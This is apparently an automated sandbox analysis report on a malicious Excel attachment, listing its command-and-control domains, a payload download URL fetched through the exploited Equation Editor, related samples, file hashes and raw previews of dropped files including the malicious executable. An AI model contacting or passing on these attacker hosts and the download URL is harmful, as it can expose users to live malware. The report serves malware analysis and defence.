http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
wekeepworking.sytes.net	8%	Virustotal		Browse
wekeepworking.sytes.net	0%	Avira URL Cloud	safe
http://198.12.127.155/new.exe	0%	Avira URL Cloud	safe
wekeepworking12.sytes.net	2%	Virustotal		Browse
wekeepworking12.sytes.net	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
wekeepworking.sytes.net	79.134.225.90	true	true	8%, Virustotal, Browse	unknown
wekeepworking12.sytes.net	unknown	unknown	true	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
wekeepworking.sytes.net	true	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://198.12.127.155/new.exe	true	Avira URL Cloud: safe	unknown
wekeepworking12.sytes.net	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.%s.comPA	RegAsm.exe, 00000005.00000002.2364096438.0000000002630000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	RegAsm.exe, 00000005.00000002.2364096438.0000000002630000.00000002.00000001.sdmp	false		high
http://www.day.com/dam/1.0	FFD606D5.emf.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
79.134.225.90	wekeepworking.sytes.net	Switzerland		6775	FINK-TELECOM-SERVICESCH	true
198.12.127.155	unknown	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	431726
Start date:	09.06.2021
Start time:	08:03:35
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Ref 0180066743.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@6/20@41/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 3.3% (good quality ratio 2.6%) Quality average: 51.8% Quality standard deviation: 33.9%
HCA Information:	Successful, ratio: 96% Number of executed functions: 77 Number of non-executed functions: 9
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): dllhost.exe Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:05:07	API Interceptor	60x Sleep call for process: EQNEDT32.EXE modified
08:05:09	API Interceptor	214x Sleep call for process: vbc.exe modified
08:05:37	API Interceptor	1171x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
79.134.225.90	AedJpyQ9lM.exe	Get hash	malicious	Browse
	Purchase Order Price List.xlsx	Get hash	malicious	Browse
	qdFDmi3Bhy.exe	Get hash	malicious	Browse
	A2PlnLyOA7.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKD.37013274.28794.exe	Get hash	malicious	Browse
	LOT_20210526.xlsx	Get hash	malicious	Browse
	Q2MAUt4mRO.exe	Get hash	malicious	Browse
	4fn66P5vkl.exe	Get hash	malicious	Browse
	P_O 00041221.xlsx	Get hash	malicious	Browse
	LOT_20210526.xlsx	Get hash	malicious	Browse
	Swift Copy.exe	Get hash	malicious	Browse
198.12.127.155	Purchase Order Price List.xlsx	Get hash	malicious	Browse	confucanism.hopto.org/new.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
wekeepworking.sytes.net	AedJpyQ9lM.exe	Get hash	malicious	Browse	79.134.225.90
	Purchase Order Price List.xlsx	Get hash	malicious	Browse	79.134.225.90
	qdFDmi3Bhy.exe	Get hash	malicious	Browse	79.134.225.90
	A2PlnLyOA7.exe	Get hash	malicious	Browse	79.134.225.90
	SecuriteInfo.com.Trojan.GenericKD.37013274.28794.exe	Get hash	malicious	Browse	79.134.225.90
	LOT_20210526.xlsx	Get hash	malicious	Browse	79.134.225.90
	Q2MAUt4mRO.exe	Get hash	malicious	Browse	79.134.225.90
	4fn66P5vkl.exe	Get hash	malicious	Browse	79.134.225.90
	P_O 00041221.xlsx	Get hash	malicious	Browse	79.134.225.90
	LOT_20210526.xlsx	Get hash	malicious	Browse	79.134.225.90
	QI5MR3pte0.exe	Get hash	malicious	Browse	185.140.53.40
	5Em2NXNxSt.exe	Get hash	malicious	Browse	185.140.53.40
	7Zpsd899Kf.exe	Get hash	malicious	Browse	185.140.53.40
	LfgEatrwIF.exe	Get hash	malicious	Browse	185.140.53.40

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
FINK-TELECOM-SERVICESCH	MS2106071066.exe	Get hash	malicious	Browse	79.134.225.71
	Kangean PO.doc	Get hash	malicious	Browse	79.134.225.72
	facture.jar	Get hash	malicious	Browse	79.134.225.69
	c3yBu1IF57.exe	Get hash	malicious	Browse	79.134.225.92
	DPSGNwkO1Z.exe	Get hash	malicious	Browse	79.134.225.25
	SecuriteInfo.com.Trojan.Win32.Save.a.16917.exe	Get hash	malicious	Browse	79.134.225.94
	AedJpyQ9lM.exe	Get hash	malicious	Browse	79.134.225.90
	H538065217Invoice.exe	Get hash	malicious	Browse	79.134.225.9
	Purchase Order Price List.xlsx	Get hash	malicious	Browse	79.134.225.90
	P.I-84512.doc	Get hash	malicious	Browse	79.134.225.41
	l00VLAF9y0xQ9Vr.exe	Get hash	malicious	Browse	79.134.225.92
	Swift [ref QT #U2013 2102001-R2]pdf.exe	Get hash	malicious	Browse	79.134.225.10
	PO756654.exe	Get hash	malicious	Browse	79.134.225.99
	qdFDmi3Bhy.exe	Get hash	malicious	Browse	79.134.225.90
	br.exe	Get hash	malicious	Browse	79.134.225.73
	Yeni sipari#U015f _WJO-001, pdf.exe	Get hash	malicious	Browse	79.134.225.71
	as.exe	Get hash	malicious	Browse	79.134.225.73
	11.exe	Get hash	malicious	Browse	79.134.225.40
	V8IB839cvz.exe	Get hash	malicious	Browse	79.134.225.25
	A2PlnLyOA7.exe	Get hash	malicious	Browse	79.134.225.90
AS-COLOCROSSINGUS	Naro#U010dite 5039066002128.xlsx	Get hash	malicious	Browse	192.227.228.121
	Proforma Inv.xlsx	Get hash	malicious	Browse	192.3.122.169
	Payment_Doc.xlsx	Get hash	malicious	Browse	107.173.219.35
	Purchase Order Price List.xlsx	Get hash	malicious	Browse	198.12.127.155
	BBS FX.xlsx	Get hash	malicious	Browse	198.12.110.183
	e#U03c2.xlsx	Get hash	malicious	Browse	192.227.228.121
	Zd1j3hnY8u.exe	Get hash	malicious	Browse	198.23.140.94
	MT103-payment confirmation.xlsx	Get hash	malicious	Browse	192.210.173.40
	yPbGfVkUrS.exe	Get hash	malicious	Browse	198.23.140.94
	Product_list.xlsx	Get hash	malicious	Browse	192.227.158.72
	P_O 07062021.xlsx	Get hash	malicious	Browse	192.3.13.56
	Agency Appointment for Mv TBN Port-Appointment Letter- 2100133.xlsx	Get hash	malicious	Browse	192.210.173.40
	Quote SEQTE00311701.xlsx	Get hash	malicious	Browse	192.227.158.72
	New206745#874645_pdf.exe	Get hash	malicious	Browse	192.3.141.183
	print PO#6321023.docx	Get hash	malicious	Browse	23.95.122.53
	print PO#6321023.docx	Get hash	malicious	Browse	23.95.122.53
	mjzvlwau	Get hash	malicious	Browse	23.94.40.0
	INVOICE#1191189.xlsx	Get hash	malicious	Browse	107.173.219.35
	item_list.xlsx	Get hash	malicious	Browse	192.227.158.72
	_Vm064855583.HtM	Get hash	malicious	Browse	23.94.52.94

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\RegAsm.exe	Purchase Order Price List.xlsx	Get hash	malicious	Browse
	Quote QU038097.doc	Get hash	malicious	Browse
	6Cprm97UTl.xls	Get hash	malicious	Browse
	Payment_Confirmation_Slip.xlsx	Get hash	malicious	Browse
	Overdue Invoice.xlsx	Get hash	malicious	Browse
	Quotation.xlsx	Get hash	malicious	Browse
	ENCLOSE ORDER LIST.xlsx	Get hash	malicious	Browse
	PO INV 195167 & 195324.xlsx	Get hash	malicious	Browse
	Bank letter.xlsx	Get hash	malicious	Browse
	Quotation.xlsx	Get hash	malicious	Browse
	PO 19030004.xlsx	Get hash	malicious	Browse
	New PO PO20.xlsx	Get hash	malicious	Browse
	ORDER LIST.xlsx	Get hash	malicious	Browse
	RFQ 00112.xlsx	Get hash	malicious	Browse
	inquiry.xlsx	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	734208
Entropy (8bit):	7.833756558737052
Encrypted:	false
SSDEEP:	12288:iRqIue16rc2fV5hZcK1KjkiZCx7jsFuR6Y/ctiBHkcpZtoMZ:AqIue1kff/ECKwiZCx34mcC9LtoMZ
MD5:	EB43B3C033BD76B51B90A51A6726A81C
SHA1:	0D39FFCF64ED4F38EA83A72D726D40881F583014
SHA-256:	4E9A5CC90F1D17550208942E0182E9A99598C18C19B3467C184A46F4214755E2
SHA-512:	7EFB598153F2C4760FE17F7EF6510F5A48482027434B303A93439BD4C472C3D4E676E3BB8AED268277696F834DC93EA8853481D94C5FACAF61BECF4A23C17A8C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 39%, Browse Antivirus: ReversingLabs, Detection: 30%
Reputation:	low
IE Cache URL:	http://198.12.127.155/new.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`.................(...........G... ...`....@.. ....................................@.................................PG..K....`..`............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc...`....`.....................@..@.reloc...............2..............@..B.................G......H........S.. ;..............2............................................0.......... ........8........E....}...).......I.......8x...(....8....8t... ....~....9....&8.....:4... ....~a...:....& ....8....8/... ....~{...:....&8....(.... ....~...9p...&8f....:....8....8....8...........(......(0...&~..........~......0..t........(.... ....~!...:....& ....8....8........E.... .......8....8.... ....~q...:....&8.......9....&&8....8....}....8....~...9....8....&{....8....&8....~...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1717583E.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\17662F27.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	79394
Entropy (8bit):	7.864111100215953
Encrypted:	false
SSDEEP:	1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
MD5:	16925690E9B366EA60B610F517789AF1
SHA1:	9F3FE15AE44644F9ED8C2CA668B7020DF726426B
SHA-256:	C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
SHA-512:	AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..MA..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z._....\|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}\|.._...>r.v~..G..)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..\|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6A2B8E08.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\707074AB.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\81C8EEFC.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	51166
Entropy (8bit):	7.767050944061069
Encrypted:	false
SSDEEP:	1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
MD5:	8C29CF033A1357A8DE6BF1FC4D0B2354
SHA1:	85B228BBC80DC60D40F4D3473E10B742E7B9039E
SHA-256:	E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
SHA-512:	F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
Malicious:	false
Preview:	.PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...\|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\86ABDEF1.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	50311
Entropy (8bit):	7.960958863022709
Encrypted:	false
SSDEEP:	768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
MD5:	4141C7515CE64FED13BE6D2BA33299AA
SHA1:	B290F533537A734B7030CE1269AC8C5398754194
SHA-256:	F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
SHA-512:	74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
Malicious:	false
Preview:	.PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..\|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..\|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.\|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87A50956.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	51166
Entropy (8bit):	7.767050944061069
Encrypted:	false
SSDEEP:	1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
MD5:	8C29CF033A1357A8DE6BF1FC4D0B2354
SHA1:	85B228BBC80DC60D40F4D3473E10B742E7B9039E
SHA-256:	E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
SHA-512:	F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
Malicious:	false
Preview:	.PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...\|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9D956669.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	79394
Entropy (8bit):	7.864111100215953
Encrypted:	false
SSDEEP:	1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
MD5:	16925690E9B366EA60B610F517789AF1
SHA1:	9F3FE15AE44644F9ED8C2CA668B7020DF726426B
SHA-256:	C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
SHA-512:	AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
Malicious:	false
Preview:	.PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..MA..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z._....\|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}\|.._...>r.v~..G..)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..\|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CEC1BA6A.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
